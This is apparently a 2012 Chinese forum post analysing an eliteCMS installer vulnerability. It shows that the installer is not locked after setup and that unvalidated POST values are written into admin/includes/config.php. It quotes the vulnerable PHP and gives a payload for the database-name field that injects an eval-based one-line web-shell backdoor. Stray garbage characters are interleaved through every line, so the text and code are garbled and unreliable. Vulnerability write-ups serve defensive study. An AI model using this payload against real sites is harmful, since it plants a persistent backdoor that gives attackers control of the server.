eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装" @+ X6 R a' G
w+ ~) h9 W. {' S8 o另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php5 ^$ d$ x8 A% {2 r7 P
我们来看代码:
' m7 U0 h* F& H: K: e$ j: g
% _5 [# Q) Z5 a" v...
+ j8 i0 g. y2 \+ b+ o7 qelseif ($_GET['step'] == "4") {1 p5 A# I! E$ G+ K0 V
$file = "../admin/includes/config.php";
$ f4 H7 l0 j& v8 r! h $write = "<?php\n";
$ l/ w6 E/ s: N* W( {* L9 ^7 j. P3 l $write .= "/**\n";6 D; E8 Q7 B8 j8 i
$write .= "*\n";; p9 M" \6 j+ n! w
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
' l% y6 q c. [...略...; W W. b1 a% F
$write .= "*\n";1 g5 J3 O9 \! e O- B
$write .= "*/\n";& Q5 Q) N* z9 W$ {1 d
$write .= "\n";" w/ H( S2 ~% S7 C
$write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";$ a7 p/ a, y8 P" {+ \
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";4 x3 E. }$ d# t9 O+ F$ b
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
5 Y( P k& h7 S( x+ w $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
5 O h5 t% D$ h: C1 U9 a( r $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
; X3 C! A. x4 k5 s. [ $write .= "if (!\$connection) {\n";" [' P6 X3 z* U3 T2 N% r
$write .= " die(\"Database connection failed\" .mysql_error());\n";
v( d% s( p- V $write .= " \n"; H8 {5 D4 n- a A H+ z
$write .= "} \n";
8 _. V! s$ K5 f$ b- j( c G/ X $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";, K( P% R- g$ U1 K; W9 D
$write .= "if (!\$db_select) {\n";7 q$ r+ ?/ _3 A* s# B5 x1 b% ]
$write .= " die(\"Database select failed\" .mysql_error());\n";# E4 {( q/ s1 {( | ^' W( G( j
$write .= " \n";8 p- Z2 A! i' \/ n2 | s
$write .= "} \n";1 P) @2 u. Y* r1 B3 @; E
$write .= "?>\n";0 h2 F4 X. D7 S4 G
1 ~$ ?: J7 L( m# H
$writer = fopen($file, 'w');
+ T) w4 u8 N+ @" q...1 \; M) ^( v( j. z
' o* P6 t" ~1 t( ~5 {
在看代码:) l" M/ j$ @ p+ p3 Y) }0 _
3 C& t3 M% ], u% M2 d; {' s$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];7 X( b2 ]4 t, t" P7 y: h
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];1 U& [ y& o; ?' |
$_SESSION['DB_USER'] = $_POST['DB_USER'];
) N. t8 |4 v8 r# M- `$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
- S7 Q, l# W* S: y: R
. E6 R3 l3 `% u9 `) B- R8 F取值未作任何验证. }1 v( e- K2 y3 _% e- B ?- S
如果将数据库名POST数据:! P/ L7 C! X4 o. s9 C3 G
5 ~1 H) h8 d g5 i# r"?><?php eval($_POST[c]);?><?php+ Y6 b d- Y8 _, l8 Z0 A7 r
1 T2 a3 `; d4 W5 }0 O! c( w3 j将导致一句话后门写入/admin/includes/config.php) E% O/ h6 k5 z+ {7 Z1 F
|
发表于 2012-11-18 13:59:27
收藏
支持
反对